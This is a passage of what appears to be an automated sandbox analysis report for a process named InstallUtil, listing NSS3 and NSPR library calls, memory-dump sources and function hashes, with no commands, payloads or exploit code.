                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6C75AB95,00000000,?,00000000,00000000,00000000), ref: 6C77B1A2
                                                                                                                  • PR_GetCurrentThread.NSS3(?,?,?,?,6C75AB95,00000000,?,00000000,00000000,00000000), ref: 6C77B1AA
                                                                                                                  • PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6C75AB95,00000000,?,00000000,00000000,00000000), ref: 6C77B1C2
                                                                                                                    • Part of subcall function 6C7A1560: TlsGetValue.KERNEL32(00000000,?,6C770844,?), ref: 6C7A157A
                                                                                                                    • Part of subcall function 6C7A1560: EnterCriticalSection.KERNEL32(?,?,?,6C770844,?), ref: 6C7A158F
                                                                                                                    • Part of subcall function 6C7A1560: PR_Unlock.NSS3(?,?,?,?,6C770844,?), ref: 6C7A15B2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4188828017-0
                                                                                                                  • Opcode ID: d82638fc66ad871026b719998149dab2f3da75e7af32303868f083e9b78c8a5f
                                                                                                                  • Instruction ID: b78adb4038d6feb59a07b44f6659886c5835588d4f03497ab9edaf749e7f2dc6
                                                                                                                  • Opcode Fuzzy Hash: d82638fc66ad871026b719998149dab2f3da75e7af32303868f083e9b78c8a5f
                                                                                                                  • Instruction Fuzzy Hash: A4A1CFB1D0020AABEF109F64DE89BEE77B4AF05318F144135E805A6752E731E959CBE1
                                                                                                                  Function 6C79E550 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 384COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C79E5A0
                                                                                                                    • Part of subcall function 6C7FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7FC2BF
                                                                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C79E5F2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorValuememcpy
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 3044119603-4108050209
                                                                                                                  • Opcode ID: 3732ef35399be21741471bbe200808da703a4efd1d1db0bc79554e3d8a90f77a
                                                                                                                  • Instruction ID: 148fb04c74bd6690300742e28427deac9906041980b14dc7255ff8907e52c365
                                                                                                                  • Opcode Fuzzy Hash: 3732ef35399be21741471bbe200808da703a4efd1d1db0bc79554e3d8a90f77a
                                                                                                                  • Instruction Fuzzy Hash: 21F18BB1A002199FDB218F24ED84BDAB7B5BF49318F0441A8E908A7751E771EE94CFD1
                                                                                                                  Function 6C772C40 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 163COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32(#?wl,?,6C76E477,?,?,?,00000001,00000000,?,?,6C773F23,?), ref: 6C772C62
                                                                                                                  • EnterCriticalSection.KERNEL32(0000001C,?,6C76E477,?,?,?,00000001,00000000,?,?,6C773F23,?), ref: 6C772C76
                                                                                                                  • PL_HashTableLookup.NSS3(00000000,?,?,6C76E477,?,?,?,00000001,00000000,?,?,6C773F23,?), ref: 6C772C86
                                                                                                                  • PR_Unlock.NSS3(00000000,?,?,?,?,6C76E477,?,?,?,00000001,00000000,?,?,6C773F23,?), ref: 6C772C93
                                                                                                                    • Part of subcall function 6C7FDD70: TlsGetValue.KERNEL32 ref: 6C7FDD8C
                                                                                                                    • Part of subcall function 6C7FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7FDDB4
                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,6C76E477,?,?,?,00000001,00000000,?,?,6C773F23,?), ref: 6C772CC6
                                                                                                                  • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C76E477,?,?,?,00000001,00000000,?,?,6C773F23,?), ref: 6C772CDA
                                                                                                                  • PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C76E477,?,?,?,00000001,00000000,?,?,6C773F23), ref: 6C772CEA
                                                                                                                  • PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C76E477,?,?,?,00000001,00000000,?), ref: 6C772CF7
                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C76E477,?,?,?,00000001,00000000,?), ref: 6C772D4D
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C772D61
                                                                                                                  • PL_HashTableLookup.NSS3(?,?), ref: 6C772D71
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C772D7E
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407AD
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407CD
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407D6
                                                                                                                    • Part of subcall function 6C7407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6D204A), ref: 6C7407E4
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,6C6D204A), ref: 6C740864
                                                                                                                    • Part of subcall function 6C7407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C740880
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,6C6D204A), ref: 6C7408CB
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(?,?,6C6D204A), ref: 6C7408D7
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(?,?,6C6D204A), ref: 6C7408FB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
                                                                                                                  • String ID: #?wl
                                                                                                                  • API String ID: 2446853827-2559491875
                                                                                                                  • Opcode ID: 35d6ad21062563facae29f7a6cc9e07cee9b19bbea3830501a931495b9aeb60a
                                                                                                                  • Instruction ID: c59f1387e70f485bdf4452375780a743bd24b531e795eccee54650e162b06a82
                                                                                                                  • Opcode Fuzzy Hash: 35d6ad21062563facae29f7a6cc9e07cee9b19bbea3830501a931495b9aeb60a
                                                                                                                  • Instruction Fuzzy Hash: C451D3B5D00609ABDB109F24DD498AA77B8AF2935CB048534EC2897B12F731ED64C7E1
                                                                                                                  Function 6C82A4C0 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 145COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C82A4E6
                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C82A4F9
                                                                                                                  • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C82A553
                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C82A5AC
                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C82A5F7
                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C82A60C
                                                                                                                  • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000110E1,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C82A633
                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C82A671
                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C82A69A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _byteswap_ulong$_byteswap_ushortsqlite3_log
                                                                                                                  • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                  • API String ID: 2358773949-598938438
                                                                                                                  • Opcode ID: 9ee3a62eaa4f37e366c3bf2a7126f7e79968219dc2fb6107463f46b2db087744
                                                                                                                  • Instruction ID: 99c652615f32342b3695cfa7385aec84c2ccc314b47c61ea75f3baec247bc34a
                                                                                                                  • Opcode Fuzzy Hash: 9ee3a62eaa4f37e366c3bf2a7126f7e79968219dc2fb6107463f46b2db087744
                                                                                                                  • Instruction Fuzzy Hash: D05190B1908300ABDB218F29DA84A9B7BE1AF44718F044C7DE84947B51F735DD84CBD2
                                                                                                                  Function 6C7545B0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 135memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,6C751984,?), ref: 6C7545F2
                                                                                                                  • SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C7545FB
                                                                                                                    • Part of subcall function 6C7B0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7B08B4
                                                                                                                  • SECITEM_CompareItem_Util.NSS3(00000000,-00000001), ref: 6C75461E
                                                                                                                    • Part of subcall function 6C7AFCB0: memcmp.VCRUNTIME140(?,8B0B74C0,04C6831E,?,00000000,?,6C754101,00000000,?,?,?,6C751666,?,?), ref: 6C7AFCF2
                                                                                                                  • SECITEM_CopyItem_Util.NSS3(00000000,?,-00000019), ref: 6C754646
                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C754662
                                                                                                                  • PR_SetError.NSS3(FFFFE023,00000000), ref: 6C75467A
                                                                                                                  • PR_CallOnce.NSS3(6C8B2AA4,6C7B12D0), ref: 6C754691
                                                                                                                  • PL_FreeArenaPool.NSS3 ref: 6C7546A3
                                                                                                                  • PL_FinishArenaPool.NSS3 ref: 6C7546AB
                                                                                                                  • free.MOZGLUE(?), ref: 6C7546BC
                                                                                                                  • PORT_ZAlloc_Util.NSS3(?), ref: 6C7546E5
                                                                                                                  • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C754717
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$ArenaItem_Pool$Error$Alloc_CallCompareCopyDecodeFindFinishFreeInitOnceQuickTag_freememcmpmemcpy
                                                                                                                  • String ID: security
                                                                                                                  • API String ID: 3482804875-3315324353
                                                                                                                  • Opcode ID: dd9fd4b984585946bfa9014912f6422254bbb40906f17f8e8dfda6c8d37dacc5
                                                                                                                  • Instruction ID: 4c7eb8ea70bc3f4cd06c9a05926c2c72efeae5ebd7f4a0c0758f0dc4fd7e4686
                                                                                                                  • Opcode Fuzzy Hash: dd9fd4b984585946bfa9014912f6422254bbb40906f17f8e8dfda6c8d37dacc5
                                                                                                                  • Instruction Fuzzy Hash: 3D41F7B2905310ABE7108F659E48B5B77E8EF4425CF450A38EC19A3B81EB31E634C7D6
                                                                                                                  Function 6C7CAD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7CADB1
                                                                                                                    • Part of subcall function 6C7ABE30: SECOID_FindOID_Util.NSS3(6C76311B,00000000,?,6C76311B,?), ref: 6C7ABE44
                                                                                                                  • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C7CADF4
                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C7CAE08
                                                                                                                    • Part of subcall function 6C7AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8818D0,?), ref: 6C7AB095
                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7CAE25
                                                                                                                  • PL_FreeArenaPool.NSS3 ref: 6C7CAE63
                                                                                                                  • PR_CallOnce.NSS3(6C8B2AA4,6C7B12D0), ref: 6C7CAE4D
                                                                                                                    • Part of subcall function 6C6D4C70: TlsGetValue.KERNEL32(?,?,?,6C6D3921,6C8B14E4,6C81CC70), ref: 6C6D4C97
                                                                                                                    • Part of subcall function 6C6D4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C6D3921,6C8B14E4,6C81CC70), ref: 6C6D4CB0
                                                                                                                    • Part of subcall function 6C6D4C70: PR_Unlock.NSS3(?,?,?,?,?,6C6D3921,6C8B14E4,6C81CC70), ref: 6C6D4CC9
                                                                                                                  • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7CAE93
                                                                                                                  • PR_CallOnce.NSS3(6C8B2AA4,6C7B12D0), ref: 6C7CAECC
                                                                                                                  • PL_FreeArenaPool.NSS3 ref: 6C7CAEDE
                                                                                                                  • PL_FinishArenaPool.NSS3 ref: 6C7CAEE6
                                                                                                                  • PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7CAEF5
                                                                                                                  • PL_FinishArenaPool.NSS3 ref: 6C7CAF16
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
                                                                                                                  • String ID: security
                                                                                                                  • API String ID: 3441714441-3315324353
                                                                                                                  • Opcode ID: dc52872ff15ffaa664b533aa718b75b36141727666605c9d8f1cd060323721e7
                                                                                                                  • Instruction ID: 8294814eb25b55fb675e2654446cb4539f906d3429dc611c6bae4c2917f9538f
                                                                                                                  • Opcode Fuzzy Hash: dc52872ff15ffaa664b533aa718b75b36141727666605c9d8f1cd060323721e7
                                                                                                                  • Instruction Fuzzy Hash: B0413BB1A043016FE7205B14AE4EBAB32BCAF5272EF140635E914A2F41F735D608C6D7
                                                                                                                  Function 6C86AF70 Relevance: 22.7, APIs: 15, Instructions: 221threadCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6C819890: TlsGetValue.KERNEL32(?,?,?,6C8197EB), ref: 6C81989E
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C86AF88
                                                                                                                  • _PR_MD_NOTIFYALL_CV.NSS3(?), ref: 6C86AFCE
                                                                                                                  • PR_SetPollableEvent.NSS3(?), ref: 6C86AFD9
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C86AFEF
                                                                                                                  • _PR_MD_NOTIFY_CV.NSS3(?), ref: 6C86B00F
                                                                                                                  • _PR_MD_UNLOCK.NSS3(?), ref: 6C86B02F
                                                                                                                  • _PR_MD_UNLOCK.NSS3(?), ref: 6C86B070
                                                                                                                  • PR_JoinThread.NSS3(?), ref: 6C86B07B
                                                                                                                  • free.MOZGLUE(?), ref: 6C86B084
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C86B09B
                                                                                                                  • _PR_MD_UNLOCK.NSS3(?), ref: 6C86B0C4
                                                                                                                  • PR_JoinThread.NSS3(?), ref: 6C86B0F3
                                                                                                                  • free.MOZGLUE(?), ref: 6C86B0FC
                                                                                                                  • PR_JoinThread.NSS3(?), ref: 6C86B137
                                                                                                                  • free.MOZGLUE(?), ref: 6C86B140
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalEnterJoinSectionThreadfree$EventPollableValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 235599594-0
                                                                                                                  • Opcode ID: ad74f8e109841c15ee3df285b83c50e050fa7e337add5e1c80e79b880ead30c7
                                                                                                                  • Instruction ID: 9503cc01ecea806310f2ce9a671d8b0b38776c41465e367b1bfd1622eab4391f
                                                                                                                  • Opcode Fuzzy Hash: ad74f8e109841c15ee3df285b83c50e050fa7e337add5e1c80e79b880ead30c7
                                                                                                                  • Instruction Fuzzy Hash: AA915BB5900611DFCB20DF19D98095ABBF1BF4931C7298979D8195BB22E732FC46CB81
                                                                                                                  Function 6C768DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32(?,?), ref: 6C768E22
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C768E36
                                                                                                                  • memset.VCRUNTIME140(?,00000000,?), ref: 6C768E4F
                                                                                                                  • calloc.MOZGLUE(00000001,?,?,?), ref: 6C768E78
                                                                                                                  • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C768E9B
                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C768EAC
                                                                                                                  • PL_ArenaAllocate.NSS3(?,?), ref: 6C768EDE
                                                                                                                  • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C768EF0
                                                                                                                  • memset.VCRUNTIME140(?,00000000,?), ref: 6C768F00
                                                                                                                  • free.MOZGLUE(?), ref: 6C768F0E
                                                                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C768F39
                                                                                                                  • memset.VCRUNTIME140(?,00000000,?), ref: 6C768F4A
                                                                                                                  • memset.VCRUNTIME140(?,00000000,?), ref: 6C768F5B
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C768F72
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C768F82
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1569127702-0
                                                                                                                  • Opcode ID: 0bf6663853fe33175d28f8a588a722b1fcc03c0e1ca05b0e32d1517f12191b86
                                                                                                                  • Instruction ID: e139a44ad5d32dfa3b1c487cc682dc8c0364261fe297cfa0450ed2739be6c3a1
                                                                                                                  • Opcode Fuzzy Hash: 0bf6663853fe33175d28f8a588a722b1fcc03c0e1ca05b0e32d1517f12191b86
                                                                                                                  • Instruction Fuzzy Hash: F55106B2E002059FD7109F6ACD889AEB7B9EF56358F14453AEC089BB00E731ED4587E1
                                                                                                                  Function 6C860FF0 Relevance: 22.6, APIs: 15, Instructions: 92COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PR_Lock.NSS3(?), ref: 6C861000
                                                                                                                    • Part of subcall function 6C819BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C741A48), ref: 6C819BB3
                                                                                                                    • Part of subcall function 6C819BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C741A48), ref: 6C819BC8
                                                                                                                  • PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6C861016
                                                                                                                    • Part of subcall function 6C7FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7FC2BF
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C861021
                                                                                                                    • Part of subcall function 6C7FDD70: TlsGetValue.KERNEL32 ref: 6C7FDD8C
                                                                                                                    • Part of subcall function 6C7FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7FDDB4
                                                                                                                  • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C861046
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C86106B
                                                                                                                  • PR_Lock.NSS3 ref: 6C861079
                                                                                                                  • PR_Unlock.NSS3 ref: 6C861096
                                                                                                                  • free.MOZGLUE(?), ref: 6C8610A7
                                                                                                                  • free.MOZGLUE(?), ref: 6C8610B4
                                                                                                                  • PR_DestroyCondVar.NSS3(?), ref: 6C8610BF
                                                                                                                  • PR_DestroyCondVar.NSS3(?), ref: 6C8610CA
                                                                                                                  • PR_DestroyCondVar.NSS3(?), ref: 6C8610D5
                                                                                                                  • PR_DestroyCondVar.NSS3(?), ref: 6C8610E0
                                                                                                                  • PR_DestroyLock.NSS3(?), ref: 6C8610EB
                                                                                                                  • free.MOZGLUE(?), ref: 6C861105
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
